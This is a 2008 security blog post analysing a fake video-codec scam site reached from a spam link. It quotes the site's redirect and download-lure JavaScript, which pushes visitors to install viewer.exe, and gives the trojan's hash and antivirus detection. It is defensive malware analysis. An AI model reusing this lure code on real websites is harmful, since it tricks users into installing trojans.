[Malware] Dissection of a Fake Codec Malicious Website

October 26, 2008

Hi,

Today I’ve received a spam mail from peteru.aranka.mark@t-online.de with the subject
“You gotta take a look at this video.” and a link to http://k_CENSORED_y.net/

From this domain we will be redirected to http://79._CENSORED_.18/ that presents
the following HTML:

———————————–
<script type=”text/javascript”>
<!–
window.location = “/uploads”
//–>
</script>
————————————

as suggested by the window.location we postpone /uploads to http://79._CENSORED_.18/

so we land here:

——————–
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href=”http://79._CENSORED_.18/uploads/”>here</a&gt;.</p>
<hr>
<address>Apache/2 Server at 79.1_CENSORED_.18 Port 80</address>
</body></html>
——————-

Get again with Malzilla http://79._CENSORED_.18/uploads/ and finally we land into the
real malicious page.

——————
<html>
<head>
<title>HARDCORE VIDEO ONLINE!</title>
——————

this is really intersting

——————
<script language=”javascript”>
codec_url=’viewer.exe’;
</script>
——————

Sounds like the classic Codec Scam, so let’s see what other does this page..

——————
<script language=”javascript”>

function softdownload()
{
if(window.navigator.userAgent.indexOf(“SV1”) != -1 || window.navigator.userAgent.indexOf(“MSIE 7”) !=-1)
{
return;
}
else
{
window.setTimeout(“location.href='” + codec_url + “‘”, 3000);
}
}

function play() {
if (confirm(‘Click \’OK\’ to download and install media codec.’)) {
window.location.href=codec_url;
}
else {
if (alert(‘Please download new version of media codec software.’)) {
play();
}
else {
play();
}
}
}
——————

The first function checks the UserAgent used by the victim if matches the correct
conditions, assembles the string that constitutes the download url.
The play() function tell to the victim to download and install viewer.exe

This is the fake advertise:

——————
<b>Video ActiveX Object Error:</b><br>

Your browser cannot display this video file.<br><br>
You need to download new version of Video<br>
ActiveX Object to play this video file.
——————

so user is prompted to download the Fake Codec.

Let’s see what is viewer.exe

File:      viewer.exe
Status: INFECTED/MALWARE
MD5:     9eae38ac9c9a97074ce4119d81fa7acf
Packers detected: –

Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aggp

So pay attention when you meet Websites that offers strange custom Codecs! 😉

See you to the next post.. 🙂

Leave a Comment » | (In)Security | Tagged: , , , , , , , | Permalink
Posted by evilcodecave